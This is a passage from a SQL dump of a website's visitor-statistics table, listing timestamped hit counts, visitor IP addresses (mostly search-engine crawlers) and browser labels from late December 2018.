80879,1,1,0,0,'95.108.213.4','other'),(360279,1545980882,4,4,0,0,'178.154.244.11','other'),(360280,1545980891,1,1,0,0,'54.36.148.232','other'),(360281,1545981135,1,1,0,0,'54.36.149.42','other'),(360282,1545981227,5,5,0,0,'216.244.66.241','other'),(360283,1545981380,1,1,0,0,'46.229.168.145','other'),(360284,1545981485,1,1,0,0,'54.36.148.77','other'),(360285,1545981562,1,1,0,0,'54.36.149.49','other'),(360286,1545981576,1,1,0,0,'54.36.149.48','other'),(360287,1545981631,3,3,0,0,'5.45.207.19','other'),(360288,1545981652,1,1,0,0,'54.36.148.36','other'),(360289,1545981683,4,4,0,0,'5.45.207.79','other'),(360290,1545981754,1,1,0,0,'54.36.148.180','other'),(360291,1545981756,1,1,0,0,'54.36.148.51','other'),(360292,1545981880,1,1,0,0,'54.36.148.136','other'),(360293,1545982108,2,2,0,0,'52.53.201.78','chrome'),(360294,1545982151,1,1,0,0,'54.36.148.14','other'),(360295,1545982180,1,1,0,0,'46.229.168.147','other'),(360296,1545982311,1,1,0,0,'54.36.148.118','other'),(360297,1545982314,1,1,0,0,'87.250.224.47','other'),(360298,1545982452,1,1,0,0,'202.46.49.61','chrome'),(360299,1545982454,1,1,0,0,'202.46.56.75','chrome'),(360300,1545982459,1,1,0,0,'54.36.149.5','other'),(360301,1545982501,1,1,0,0,'66.249.66.157','chrome'),(360303,1545982534,1,1,0,0,'46.229.168.144','other'),(360304,1545982561,1,1,0,0,'54.36.149.8','other'),(360305,1545982713,1,1,0,0,'54.36.148.47','other'),(360306,1545982719,1,1,0,0,'5.45.207.79','other'),(360307,1545982721,2,2,0,0,'5.45.207.19','other'),(360308,1545982886,1,1,0,0,'54.36.149.43','other'),(360309,1545982984,1,1,0,0,'54.36.149.63','other'),(360310,1545983279,1,1,0,0,'213.180.203.9','other'),(360311,1545983352,1,1,0,0,'46.229.168.150','other'),(360312,1545983353,1,1,0,0,'46.229.168.135','other'),(360313,1545983465,1,1,0,0,'54.36.148.223','other'),(360314,1545983809,1,1,0,0,'178.154.244.11','other'),(360315,1545983862,1,1,0,0,'87.250.224.47','other'),(360316,1545983889,1,1,0,0,'5.45.207.19','other'),(360317,1545983947,1,1,0,0,'54.36.148.251','other'),(360318,1545983955,7,7,0,0,'87.244.176.146','firefox'),(360319,1545984011,1,1,0,0,'54.36.148.134','other'),(360320,1545984118,4,4,0,0,'216.244.66.241','other'),(360321,1545984154,1,1,0,0,'207.46.13.170','other'),(360322,1545984310,1,1,0,0,'88.99.2.203','other'),(360323,1545984399,1,1,0,0,'54.36.148.92','other'),(360324,1545984677,1,1,0,0,'66.102.9.38','chrome'),(360325,1545984678,1,1,0,0,'66.102.9.62','chrome'),(360326,1545984682,2,2,0,0,'92.113.19.82','chrome'),(360327,1545984701,2,2,0,0,'157.55.39.207','other'),(360328,1545984904,1,1,0,0,'54.36.148.215','other'),(360329,1545984929,4,4,0,0,'176.241.155.167','chrome'),(360330,1545985134,1,1,0,0,'207.46.13.221','other'),(360331,1545985141,1,1,0,0,'54.36.149.10','other'),(360332,1545985154,1,1,0,0,'54.36.148.106','other'),(360333,1545985284,1,1,0,0,'54.36.148.93','other'),(360334,1545985474,1,1,0,0,'54.36.149.90','other'),(360335,1545985565,1,1,0,0,'54.36.148.183','other'),(360336,1545985636,4,4,0,0,'94.100.221.234','chrome'),(360337,1545985848,1,1,0,0,'54.36.148.71','other'),(360338,1545985873,1,1,0,0,'157.55.39.68','other'),(360339,1545985979,2,2,0,0,'54.36.149.13','other'),(360340,1545986131,1,1,0,0,'54.36.148.234','other'),(360341,1545986305,1,1,0,0,'54.36.149.49','other'),(360342,1545986355,1,1,0,0,'54.36.148.177','other'),(360343,1545986465,1,1,0,0,'54.36.149.95','other'),(360344,1545986487,1,1,0,0,'46.229.168.144','other'),(360345,1545986864,7,7,0,0,'216.244.66.241','other'),(360346,1545986917,1,1,0,0,'8.29.198.27','other'),(360347,1545986925,1,1,0,0,'54.36.148.131','other'),(360348,1545986930,1,1,0,0,'54.36.148.226','other'),(360349,1545987054,1,1,0,0,'66.249.66.42','chrome'),(360350,1545987192,1,1,0,0,'207.46.13.42','other'),(360351,1545987488,1,1,0,0,'157.55.39.207','other'),(360352,1545987538,1,1,0,0,'46.229.168.147','other'),(360353,1545987637,1,1,0,0,'54.36.149.60','other'),(360354,1545987716,1,1,0,0,'54.36.149.25','other'),(360355,1545987762,2,2,0,0,'40.77.167.90','other'),(360356,1545987970,1,1,0,0,'54.36.148.137','other'),(360357,1545988013,1,1,0,0,'54.36.148.158','other'),(360358,1545988014,1,1,0,0,'8.29.198.27','other'),(360359,1545988156,1,1,0,0,'54.36.148.212','other'),(360360,1545988540,1,1,0,0,'95.163.255.92','other'),(360361,1545988543,1,1,0,0,'95.163.255.93','other'),(360362,1545988592,1,1,0,0,'54.36.148.48','other'),(360363,1545988639,1,1,0,0,'54.36.148.225','other'),(360364,1545988661,1,1,0,0,'91.196.178.168','chrome'),(360365,1545988699,1,1,0,0,'54.36.149.7','other'),(360366,1545988744,2,2,0,0,'91.196.178.84','firefox'),(360367,1545988780,1,1,0,0,'54.36.148.130','other'),(360368,1545988784,1,1,0,0,'54.36.148.85','other'),(360369,1545988787,2,2,0,0,'94.100.221.234','chrome'),(360370,1545988809,2,2,0,0,'216.244.66.241','other'),(360371,1545988947,1,1,0,0,'54.36.148.207','other'),(360372,1545988994,1,1,0,0,'54.36.149.9','other'),(360373,1545989087,1,1,0,0,'54.36.149.92','other'),(360374,1545989130,1,1,0,0,'66.249.66.57','chrome'),(360375,1545989131,1,1,0,0,'66.249.66.42','chrome'),(360376,1545989212,1,1,0,0,'54.36.148.224','other'),(360377,1545989217,1,1,0,0,'54.36.149.50','other'),(360378,1545989271,2,2,0,0,'37.73.49.128','chrome'),(360379,1545989319,1,1,0,0,'157.55.39.186','other'),(360380,1545989733,1,1,0,0,'54.36.149.55','other'),(360381,1545989771,1,1,0,0,'54.36.148.34','other'),(360382,1545989833,1,1,0,0,'202.46.56.65','chrome'),(360383,1545989835,1,1,0,0,'202.46.51.16','chrome'),(360384,1545989861,3,3,0,0,'216.244.66.241','other'),(360385,1545989869,1,1,0,0,'37.9.113.148','other'),(360386,1545989877,1,1,0,0,'87.250.224.47','other'),(360387,1545989886,1,1,0,0,'5.45.207.19','other'),(360388,1545989888,1,1,0,0,'207.46.13.42','other'),(360389,1545989910,1,1,0,0,'54.36.148.192','other'),(360390,1545989915,2,2,0,0,'178.154.244.11','other'),(360391,1545989920,1,1,0,0,'54.36.149.93','other'),(360392,1545990005,1,1,0,0,'54.36.148.228','other'),(360393,1545990052,1,1,0,0,'141.8.142.103','other'),(360394,1545990112,1,1,0,0,'54.36.148.145','other'),(360395,1545990246,1,1,0,0,'66.249.66.154','chrome'),(360396,1545990313,1,1,0,0,'54.36.149.98','other'),(360397,1545990353,1,1,0,0,'66.249.66.44','chrome'),(360398,1545990396,1,1,0,0,'54.36.148.42','other'),(360399,1545990627,1,1,0,0,'5.45.207.79','other'),(360400,1545990719,1,1,0,0,'54.36.148.29','other'),(360401,1545990806,1,1,0,0,'207.46.13.210','other'),(360402,1545990925,1,1,0,0,'54.36.148.170','other'),(360403,1545990999,1,1,0,0,'216.244.66.241','other'),(360404,1545991058,1,1,0,0,'54.36.148.162','other'),(360405,1545991130,1,1,0,0,'54.36.148.21','other'),(360406,1545991132,1,1,0,0,'54.36.148.203','other'),(360407,1545991209,1,1,0,0,'46.229.168.144','other'),(360408,1545991296,1,1,0,0,'46.229.168.137','other'),(360409,1545991316,1,1,0,0,'54.36.148.146','other'),(360410,1545991424,1,1,0,0,'54.36.148.197','other'),(360411,1545991434,1,1,0,0,'54.36.148.26','other'),(360412,1545991436,1,1,0,0,'46.229.168.153','other'),(360413,1545991510,1,1,0,0,'88.99.2.203','other'),(360414,1545991541,1,1,0,0,'54.36.148.188','other'),(360415,1545991744,1,1,0,0,'54.36.149.62','other'),(360416,1545991767,1,1,0,0,'40.77.167.10','other'),(360417,1545991968,1,1,0,0,'178.154.244.11','other'),(360418,1545991992,1,1,0,0,'54.36.148.228','other'),(360419,1545992065,2,2,0,0,'91.196.178.47','chrome'),(360420,1545992239,1,1,0,0,'54.36.148.243','other'),(360421,1545992263,1,1,0,0,'157.55.39.186','other'),(360422,1545992531,1,1,0,0,'66.249.66.155','chrome'),(360423,1545992532,1,1,0,0,'66.249.66.154','chrome'),(360424,1545992597,1,1,0,0,'54.36.148.39','other'),(360425,1545992605,1,1,0,0,'54.36.148.234','other'),(360426,1545992719,5,5,0,0,'216.244.66.241','other'),(360427,1545992750,1,1,0,0,'54.36.148.60','other'),(360428,1545992790,1,1,0,0,'54.36.149.46','other'),(360429,1545992866,1,1,0,0,'54.36.148.134','other'),(360430,1545993017,1,1,0,0,'54.36.148.14','other'),(360431,1545993023,1,1,0,0,'46.229.168.137','other'),(360432,1545993025,1,1,0,0,'46.229.168.135','other'),(360433,1545993063,2,2,0,0,'91.196.178.135','firefox'),(360434,1545993110,1,1,0,0,'54.36.148.188','other'),(360435,1545993188,1,1,0,0,'54.36.148.142','other'),(360436,1545993240,1,1,0,0,'54.36.148.152','other'),(360437,1545993441,1,1,0,0,'40.77.167.10','other'),(360438,1545993470,1,1,0,0,'217.65.243.182','chrome'),(360439,1545993521,1,1,0,0,'213.180.203.9','other'),(360440,1545993557,1,1,0,0,'178.154.171.24','other'),(360441,1545993623,1,1,0,0,'54.36.148.121','other'),(360442,1545993656,1,1,0,0,'54.36.149.87','other'),(360443,1545993903,1,1,0,0,'46.229.168.148','other'),(360444,1545993905,1,1,0,0,'46.229.168.143','other'),(360445,1545994059,1,1,0,0,'178.154.244.11','other'),(360446,1545994060,1,1,0,0,'5.45.207.79','other'),(360447,1545994505,1,1,0,0,'54.36.148.41','other'),(360448,1545994568,2,2,0,0,'199.58.86.209','other'),(360449,1545994660,1,1,0,0,'216.244.66.241','other'),(360450,1545994865,1,1,0,0,'54.36.148.114','other'),(360451,1545994979,1,1,0,0,'46.229.168.130','other'),(360452,1545995142,1,1,0,0,'40.77.167.10','other'),(360453,1545995174,1,1,0,0,'54.36.148.216','other'),(360454,1545995507,2,2,0,0,'185.220.102.4','other'),(360455,1545995572,2,2,0,0,'216.244.66.241','other'),(360456,1545995633,2,2,0,0,'66.249.66.156','chrome'),(360457,1545995735,1,1,0,0,'46.229.168.144','other'),(360458,1545996050,1,1,0,0,'66.249.66.152','chrome'),(360459,1545996346,1,1,0,0,'54.36.148.196','other'),(360460,1545996499,1,1,0,0,'54.36.149.6','other'),(360461,1545996515,1,1,0,0,'54.36.148.157','other'),(360462,1545996548,1,1,0,0,'54.36.149.72','other'),(360463,1545996621,1,1,0,0,'40.77.167.10','other'),(360464,1545996671,1,1,0,0,'46.229.168.147','other'),(360465,1545996673,1,1,0,0,'46.229.168.153','other'),(360466,1545996735,1,1,0,0,'46.229.168.141','other'),(360467,1545996870,1,1,0,0,'54.36.149.101','other'),(360468,1545996903,1,1,0,0,'54.36.148.132','other'),(360469,1545997032,1,1,0,0,'178.94.33.164','chrome'),(360470,1545997103,1,1,0,0,'54.36.149.8','other'),(360471,1545997167,1,1,0,0,'66.249.66.157','chrome'),(360472,1545997227,2,2,0,0,'216.244.66.241','other'),(360473,1545997233,1,1,0,0,'23.95.182.152','chrome'),(360474,1545997234,1,1,0,0,'176.193.36.87','chrome'),(360475,1545997471,1,1,0,0,'54.36.148.57','other'),(360476,1545997479,1,1,0,0,'54.36.148.62','other'),(360477,1545997575,1,1,0,0,'95.163.255.105','other'),(360478,1545997644,1,1,0,0,'95.108.213.4','other'),(360479,1545997754,1,1,0,0,'54.36.149.88','other'),(360480,1545997755,1,1,0,0,'8.29.198.26','other'),(360481,1545997757,1,1,0,0,'54.36.149.16','other'),(360482,1545997818,1,1,0,0,'54.36.148.186','other'),(360483,1545997996,3,3,0,0,'207.46.13.210','other'),(360484,1545998234,1,1,0,0,'95.163.255.115','other'),(360485,1545998287,2,2,0,0,'40.77.167.10','other'),(360486,1545998456,1,1,0,0,'54.36.149.11','other'),(360487,1545998472,4,4,0,0,'216.244.66.241','other'),(360488,1545998520,1,1,0,0,'54.36.148.228','other'),(360489,1545998799,1,1,0,0,'54.36.148.241','other'),(360490,1545998845,1,1,0,0,'8.29.198.25','other'),(360491,1545998955,2,2,0,0,'54.36.149.51','other'),(360492,1545998995,1,1,0,0,'66.249.66.44','chrome'),(360493,1545999098,1,1,0,0,'141.8.142.103','other'),(360494,1545999166,2,2,0,0,'5.45.207.19','other'),(360495,1545999184,1,1,0,0,'178.154.244.11','other'),(360496,1545999185,1,1,0,0,'54.36.149.18','other'),(360497,1545999197,1,1,0,0,'95.108.213.4','other'),(360498,1545999360,1,1,0,0,'54.165.59.7','other'),(360499,1545999488,3,3,0,0,'5.45.207.79','other'),(360500,1545999491,1,1,0,0,'54.36.148.187','other'),(360501,1545999581,1,1,0,0,'46.229.168.153','other'),(360502,1545999582,1,1,0,0,'46.229.168.147','other'),(360503,1545999613,2,2,0,0,'66.249.66.42','chrome'),(360504,1545999650,1,1,0,0,'54.36.149.46','other'),(360505,1545999670,1,1,0,0,'87.250.224.47','other'),(360506,1545999952,1,1,0,0,'95.135.240.102','chrome'),(360507,1545999967,1,1,0,0,'66.249.66.44','chrome'),(360508,1546000157,1,1,0,0,'54.36.149.47','other'),(360509,1546000333,1,1,0,0,'54.36.148.196','other'),(360510,1546000335,1,1,0,0,'54.36.148.57','other'),(360511,1546000453,1,1,0,0,'54.36.148.20','other'),(360512,1546000675,1,1,0,0,'54.36.149.76','other'),(360513,1546000789,1,1,0,0,'46.229.168.139','other'),(360514,1546000794,1,1,0,0,'54.36.148.75','other'),(360515,1546000795,1,1,0,0,'54.36.149.23','other'),(360516,1546000846,1,1,0,0,'54.36.148.98','other'),(360517,1546000869,4,4,0,0,'95.108.213.4','other'),(360518,1546000891,5,5,0,0,'5.45.207.19','other'),(360519,1546000897,7,7,0,0,'178.154.244.11','other'),(360520,1546000904,3,3,0,0,'87.250.224.47','other'),(360521,1546000914,6,6,0,0,'5.45.207.79','other'),(360522,1546000918,1,1,0,0,'54.36.149.51','other'),(360523,1546000993,1,1,0,0,'54.36.149.65','other'),(360524,1546001028,4,4,0,0,'141.8.142.103','other'),(360525,1546001151,1,1,0,0,'54.165.59.7','other'),(360526,1546001337,5,5,0,0,'216.244.66.241','other'),(360527,1546001386,1,1,0,0,'54.36.149.26','other'),(360528,1546001471,1,1,0,0,'46.229.168.133','other'),(360529,1546001585,1,1,0,0,'91.196.178.93','chrome'),(360530,1546001660,1,1,0,0,'87.250.224.211','firefox'),(360531,1546001661,1,1,0,0,'54.36.149.68','other'),(360532,1546001662,1,1,0,0,'93.158.156.97','chrome'),(360533,1546001732,1,1,0,0,'141.8.183.23','other'),(360534,1546001739,1,1,0,0,'54.36.148.11','other'),(360535,1546001773,2,2,0,0,'37.9.113.103','other'),(360536,1546001803,1,1,0,0,'66.249.66.40','chrome'),(360537,1546001853,1,1,0,0,'178.154.171.24','other'),(360538,1546001867,9,9,0,0,'5.45.207.19','other'),(360539,1546001874,1,1,0,0,'54.36.148.131','other'),(360540,1546001877,6,6,0,0,'5.45.207.79','other'),(360541,1546001900,12,12,0,0,'178.154.244.11','other'),(360542,1546001923,1,1,0,0,'54.36.149.21','other'),(360543,1546001963,4,4,0,0,'141.8.142.103','other'),(360544,1546002103,1,1,0,0,'54.165.59.7','other'),(360545,1546002236,3,3,0,0,'95.108.213.4','other'),(360546,1546002261,1,1,0,0,'54.36.149.20','other'),(360547,1546002274,2,2,0,0,'216.244.66.241','other'),(360548,1546002323,1,1,0,0,'95.163.255.115','other'),(360549,1546002339,1,1,0,0,'207.46.13.56','other'),(360550,1546002348,1,1,0,0,'95.163.255.104','other'),(360551,1546002384,1,1,0,0,'95.163.255.114','other'),(360552,1546002401,1,1,0,0,'54.36.148.139','other'),(360553,1546002474,1,1,0,0,'54.36.148.238','other'),(360554,1546002804,4,4,0,0,'5.45.207.79','other'),(360555,1546002862,2,2,0,0,'178.154.244.11','other'),(360556,1546002951,2,2,0,0,'141.8.142.103','other'),(360557,1546002971,1,1,0,0,'54.36.148.191','other'),(360558,1546003009,1,1,0,0,'46.229.168.134','other'),(360559,1546003010,1,1,0,0,'46.229.168.147','other'),(360560,1546003126,1,1,0,0,'46.229.168.145','other'),(360561,1546003159,1,1,0,0,'54.36.148.68','other'),(360562,1546003226,1,1,0,0,'54.36.148.31','other'),(360563,1546003393,1,1,0,0,'66.249.66.154','chrome'),(360564,1546003675,1,1,0,0,'87.250.224.47','other'),(360565,1546003995,1,1,0,0,'54.36.148.157','other'),(360566,1546004087,1,1,0,0,'54.165.59.7','other'),(360567,1546004088,1,1,0,0,'54.36.148.167','other'),(360568,1546004126,1,1,0,0,'54.36.148.231','other'),(360569,1546004218,3,3,0,0,'216.244.66.241','other'),(360570,1546004333,1,1,0,0,'54.36.148.145','other'),(360571,1546005102,1,1,0,0,'46.229.168.141','other'),(360572,1546005259,3,3,0,0,'66.249.66.154','chrome'),(360573,1546005683,1,1,0,0,'66.249.66.156','chrome'),(360574,1546005851,1,1,0,0,'207.46.13.103','other'),(360575,1546006507,1,1,0,0,'95.163.255.115','other'),(360576,1546006579,1,1,0,0,'95.108.181.96','other'),(360577,1546007387,2,2,0,0,'46.229.168.129','other'),(360578,1546008160,1,1,0,0,'66.249.66.157','chrome'),(360579,1546008161,1,1,0,0,'66.249.66.152','chrome'),(360580,1546008286,1,1,0,0,'207.46.13.42','other'),(360581,1546008310,1,1,0,0,'95.163.255.119','other'),(360582,1546008593,1,1,0,0,'8.29.198.27','other'),(360583,1546008689,1,1,0,0,'95.163.255.95','other'),(360584,1546008691,1,1,0,0,'95.163.255.99','other'),(360585,1546008806,2,2,0,0,'46.229.168.133','other'),(360586,1546008883,1,1,0,0,'66.249.66.155','chrome'),(360587,1546008884,1,1,0,0,'66.249.66.154','chrome'),(360588,1546008991,2,2,0,0,'91.196.178.77','firefox'),(360589,1546009028,1,1,0,0,'46.229.168.138','other'),(360590,1546009219,1,1,0,0,'46.229.168.142','other'),(360591,1546009317,1,1,0,0,'66.249.66.156','chrome'),(360592,1546009318,1,1,0,0,'66.249.66.152','chrome'),(360593,1546009390,1,1,0,0,'46.229.168.145','other'),(360594,1546009593,1,1,0,0,'95.163.255.109','other'),(360595,1546009617,1,1,0,0,'5.45.207.79','other'),(360596,1546009678,1,1,0,0,'8.29.198.27','other'),(360597,1546010047,1,1,0,0,'66.249.66.42','chrome'),(360598,1546010090,5,5,0,0,'216.244.66.241','other'),(360599,1546010646,1,1,0,0,'66.249.66.152','chrome'),(360600,1546010767,1,1,0,0,'66.249.66.156','chrome'),(360601,1546010773,1,1,0,0,'66.249.66.154','chrome'),(360602,1546010843,1,1,0,0,'46.229.168.148','other'),(360603,1546011004,1,1,0,0,'46.229.168.130','other'),(360604,1546011039,1,1,0,0,'207.46.13.56','other'),(360605,1546011420,1,1,0,0,'37.73.220.127','chrome'),(360606,1546011498,1,1,0,0,'54.36.149.50','other'),(360607,1546011679,1,1,0,0,'157.55.39.254','other'),(360608,1546011698,1,1,0,0,'54.36.148.132','other'),(360609,1546011741,1,1,0,0,'54.36.148.240','other'),(360610,1546011820,1,1,0,0,'216.244.66.241','other'),(360611,1546011825,1,1,0,0,'54.36.149.106','other'),(360612,1546011957,1,1,0,0,'54.36.148.111','other'),(360613,1546012091,1,1,0,0,'54.36.149.46','other'),(360614,1546012187,1,1,0,0,'54.36.149.91','other'),(360615,1546012239,1,1,0,0,'54.36.149.12','other'),(360616,1546012248,1,1,0,0,'54.36.148.81','other'),(360617,1546012485,1,1,0,0,'5.45.207.19','other'),(360618,1546012641,1,1,0,0,'46.229.168.146','other'),(360619,1546012642,1,1,0,0,'46.229.168.129','other'),(360620,1546012720,1,1,0,0,'54.36.148.38','other'),(360621,1546012750,1,1,0,0,'54.36.148.224','other'),(360622,1546012860,9,9,0,0,'216.244.66.241','other'),(360623,1546012863,1,1,0,0,'46.229.168.153','other'),(360624,1546012865,1,1,0,0,'46.229.168.139','other'),(360625,1546012901,1,1,0,0,'54.36.148.105','other'),(360626,1546013190,1,1,0,0,'54.36.148.42','other'),(360627,1546013493,2,2,0,0,'5.45.207.19','other'),(360628,1546013499,1,1,0,0,'66.249.66.59','chrome'),(360629,1546013500,2,2,0,0,'66.249.66.44','chrome'),(360630,1546013506,1,1,0,0,'46.229.168.150','other'),(360631,1546013559,1,1,0,0,'54.36.148.167','other'),(360632,1546013740,1,1,0,0,'46.229.168.135','other'),(360633,1546013898,1,1,0,0,'54.36.148.152','other'),(360634,1546013905,1,1,0,0,'141.8.132.16','other'),(360635,1546013924,1,1,0,0,'54.36.148.121','other'),(360636,1546013942,1,1,0,0,'54.36.149.100','other'),(360637,1546014080,1,1,0,0,'141.8.142.108','other'),(360638,1546014098,1,1,0,0,'95.163.255.103','other'),(360639,1546014171,1,1,0,0,'95.108.181.75','other'),(360640,1546014189,1,1,0,0,'87.250.224.118','other'),(360641,1546014379,1,1,0,0,'87.250.224.65','other'),(360642,1546014401,1,1,0,0,'216.244.66.241','other'),(360644,1546014414,1,1,0,0,'54.36.148.154','other'),(360645,1546014437,1,1,0,0,'66.249.66.154','chrome'),(360646,1546014442,8,8,0,0,'5.45.207.79','other'),(360647,1546014455,3,3,0,0,'178.154.244.11','other'),(360648,1546014462,1,1,0,0,'213.180.203.9','other'),(360649,1546014464,1,1,0,0,'178.154.171.27','other'),(360650,1546014501,1,1,0,0,'46.229.168.149','other'),(360651,1546014508,1,1,0,0,'95.163.255.115','other'),(360653,1546014519,6,6,0,0,'5.45.207.19','other'),(360654,1546014591,4,4,0,0,'141.8.142.103','other'),(360655,1546014610,1,1,0,0,'46.229.168.133','other'),(360656,1546014611,1,1,0,0,'46.229.168.141','other'),(360657,1546014634,1,1,0,0,'54.36.148.40','other'),(360658,1546014740,4,4,0,0,'95.108.213.4','other'),(360659,1546014783,4,4,0,0,'87.250.224.47','other'),(360660,1546014971,2,2,0,0,'37.9.113.103','other'),(360661,1546015032,1,1,0,0,'54.36.148.27','other'),(360662,1546015103,1,1,0,0,'37.9.113.148','other'),(360663,1546015184,1,1,0,0,'178.154.244.49','other'),(360664,1546015223,1,1,0,0,'54.36.149.13','other'),(360665,1546015256,1,1,0,0,'95.163.255.116','other'),(360666,1546015274,2,2,0,0,'141.8.142.108','other'),(360667,1546015307,1,1,0,0,'46.211.27.1','chrome'),(360668,1546015427,1,1,0,0,'5.45.207.76','other'),(360669,1546015451,5,5,0,0,'5.45.207.79','other'),(360670,1546015484,3,3,0,0,'178.154.244.11','other'),(360671,1546015606,2,2,0,0,'141.8.142.103','other'),(360672,1546015732,1,1,0,0,'5.45.207.19','other'),(360673,1546015860,1,1,0,0,'87.250.224.47','other'),(360674,1546015971,1,1,0,0,'216.244.66.241','other'),(360676,1546016079,1,1,0,0,'54.36.148.112','other'),(360677,1546016094,1,1,0,0,'54.36.148.49','other'),(360678,1546016165,1,1,0,0,'46.229.168.141','other'),(360679,1546016202,1,1,0,0,'54.36.148.81','other'),(360680,1546016209,1,1,0,0,'66.249.66.40','chrome'),(360681,1546016235,1,1,0,0,'66.249.66.42','chrome'),(360682,1546016247,1,1,0,0,'180.76.15.146','other'),(360683,1546016262,1,1,0,0,'54.36.149.107','other'),(360684,1546016298,1,1,0,0,'54.36.149.32','other'),(360685,1546016609,1,1,0,0,'54.36.148.183','other'),(360686,1546016676,2,2,0,0,'91.196.178.189','chrome'),(360687,1546016859,1,1,0,0,'178.154.244.11','other'),(360688,1546016927,1,1,0,0,'54.36.148.70','other'),(360689,1546017120,2,2,0,0,'66.249.66.156','chrome'),(360690,1546017144,1,1,0,0,'46.229.168.138','other'),(360691,1546017146,1,1,0,0,'46.229.168.140','other'),(360692,1546017359,1,1,0,0,'54.36.148.179','other'),(360693,1546017425,1,1,0,0,'54.36.148.43','other'),(360694,1546017477,1,1,0,0,'216.244.66.241','other'),(360695,1546017551,1,1,0,0,'54.36.148.95','other'),(360696,1546017648,1,1,0,0,'54.36.148.184','other'),(360697,1546017843,1,1,0,0,'82.145.210.4','other'),(360698,1546017884,1,1,0,0,'54.36.148.60','other'),(360699,1546017971,1,1,0,0,'54.36.148.41','other'),(360700,1546018007,3,3,0,0,'66.249.66.154','chrome'),(360701,1546018019,1,1,0,0,'54.36.149.60','other'),(360702,1546018045,1,1,0,0,'66.249.66.59','chrome'),(360703,1546018046,1,1,0,0,'66.249.66.42','chrome'),(360704,1546018063,1,1,0,0,'54.36.149.50','other'),(360705,1546018124,1,1,0,0,'54.36.148.221','other'),(360706,1546018288,1,1,0,0,'54.36.149.27','other'),(360707,1546018297,1,1,0,0,'54.36.148.129','other'),(360708,1546018314,1,1,0,0,'54.36.149.38','other'),(360709,1546018351,1,1,0,0,'95.163.255.108','other'),(360710,1546018394,1,1,0,0,'66.249.66.157','chrome'),(360711,1546018692,1,1,0,0,'54.36.149.1','other'),(360712,1546018693,6,6,0,0,'216.244.66.241','other'),(360713,1546018884,1,1,0,0,'95.108.213.4','other'),(360714,1546019438,1,1,0,0,'8.29.198.26','other'),(360715,1546019817,2,2,0,0,'31.43.18.131','chrome'),(360716,1546019849,2,2,0,0,'216.244.66.241','other'),(360717,1546019915,1,1,0,0,'141.8.142.103','other'),(360718,1546020399,1,1,0,0,'46.229.168.154','other'),(360719,1546020429,1,1,0,0,'66.249.66.44','chrome'),(360720,1546020512,1,1,0,0,'8.29.198.26','other'),(360721,1546020516,1,1,0,0,'87.250.224.47','other'),(360722,1546020561,1,1,0,0,'46.229.168.151','other'),(360723,1546020562,1,1,0,0,'46.229.168.140','other'),(360724,1546020769,1,1,0,0,'95.163.255.107','other'),(360725,1546020992,1,1,0,0,'66.249.66.152','chrome'),(360726,1546021378,1,1,0,0,'95.163.255.118','other'),(360727,1546021786,3,3,0,0,'216.244.66.241','other'),(360728,1546021813,1,1,0,0,'37.54.40.189','chrome'),(360729,1546022369,1,1,0,0,'46.229.168.154','other'),(360730,1546022558,1,1,0,0,'95.108.213.4','other'),(360731,1546023179,2,2,0,0,'46.211.133.254','chrome'),(360732,1546023340,1,1,0,0,'178.154.244.65','other'),(360733,1546024094,4,4,0,0,'66.249.66.156','chrome'),(360734,1546024163,1,1,0,0,'46.211.56.185','chrome'),(360735,1546024249,1,1,0,0,'46.229.168.146','other'),(360736,1546024250,1,1,0,0,'46.229.168.148','other'),(360737,1546024496,7,7,0,0,'216.244.66.241','other'),(360738,1546024582,1,1,0,0,'5.45.207.79','other'),(360739,1546025041,1,1,0,0,'13.57.233.99','chrome'),(360740,1546025593,1,1,0,0,'5.45.207.19','other'),(360741,1546025792,1,1,0,0,'46.229.168.136','other'),(360742,1546025794,1,1,0,0,'87.250.224.65','other'),(360743,1546025817,1,1,0,0,'178.154.244.65','other'),(360744,1546025936,1,1,0,0,'213.180.203.9','other'),(360745,1546025956,1,1,0,0,'66.249.66.156','chrome'),(360746,1546026177,1,1,0,0,'207.46.13.42','other'),(360747,1546026203,1,1,0,0,'216.244.66.241','other'),(360748,1546026264,1,1,0,0,'46.229.168.130','other'),(360749,1546026508,1,1,0,0,'66.249.66.154','chrome'),(360750,1546026768,1,1,0,0,'46.211.46.141','chrome'),(360751,1546026846,1,1,0,0,'87.250.224.47','other'),(360752,1546027269,1,1,0,0,'46.229.168.136','other'),(360753,1546027539,6,6,0,0,'216.244.66.241','other'),(360754,1546027616,1,1,0,0,'46.229.168.142','other'),(360755,1546027783,1,1,0,0,'66.249.66.42','chrome'),(360756,1546028123,2,2,0,0,'174.199.66.105','other'),(360757,1546028843,1,1,0,0,'78.30.221.72','other'),(360758,1546028995,1,1,0,0,'216.244.66.241','other'),(360759,1546029119,1,1,0,0,'66.249.66.156','chrome'),(360760,1546030278,1,1,0,0,'8.29.198.27','other'),(360761,1546030421,1,1,0,0,'46.229.168.133','other'),(360762,1546030489,3,3,0,0,'216.244.66.241','other'),(360763,1546030625,1,1,0,0,'40.77.167.89','other'),(360764,1546030779,1,1,0,0,'46.229.168.134','other'),(360765,1546030780,1,1,0,0,'46.229.168.138','other'),(360766,1546031066,1,1,0,0,'40.77.167.190','other'),(360767,1546031301,1,1,0,0,'66.249.66.155','chrome'),(360768,1546031302,1,1,0,0,'66.249.66.154','chrome'),(360769,1546031372,1,1,0,0,'8.29.198.27','other'),(360770,1546031675,1,1,0,0,'66.249.66.157','chrome'),(360771,1546031676,1,1,0,0,'66.249.66.152','chrome'),(360772,1546033202,1,1,0,0,'46.229.168.146','other'),(360773,1546033246,1,1,0,0,'157.55.39.149','other'),(360774,1546033370,8,8,0,0,'216.244.66.241','other'),(360775,1546033890,1,1,0,0,'46.229.168.144','other'),(360776,1546034166,1,1,0,0,'46.229.168.136','other'),(360777,1546034514,1,1,0,0,'157.55.39.231','other'),(360778,1546034629,1,1,0,0,'35.187.132.180','chrome'),(360779,1546035278,1,1,0,0,'216.244.66.241','other'),(360780,1546035780,1,1,0,0,'46.229.168.132','other'),(360781,1546035782,1,1,0,0,'46.229.168.147','other'),(360782,1546035867,1,1,0,0,'46.229.168.142','other'),(360783,1546036024,1,1,0,0,'157.55.39.231','other'),(360784,1546036065,1,1,0,0,'157.55.39.116','other'),(360785,1546036257,2,2,0,0,'66.249.66.152','chrome'),(360786,1546036467,5,5,0,0,'216.244.66.241','other'),(360787,1546036632,1,1,0,0,'66.249.66.40','chrome'),(360788,1546036657,1,1,0,0,'207.46.13.42','other'),(360789,1546037341,1,1,0,0,'66.249.66.152','chrome'),(360790,1546037770,1,1,0,0,'157.55.39.149','other'),(360791,1546037813,1,1,0,0,'95.108.213.4','other'),(360792,1546037961,1,1,0,0,'46.242.32.245','msie'),(360793,1546038288,1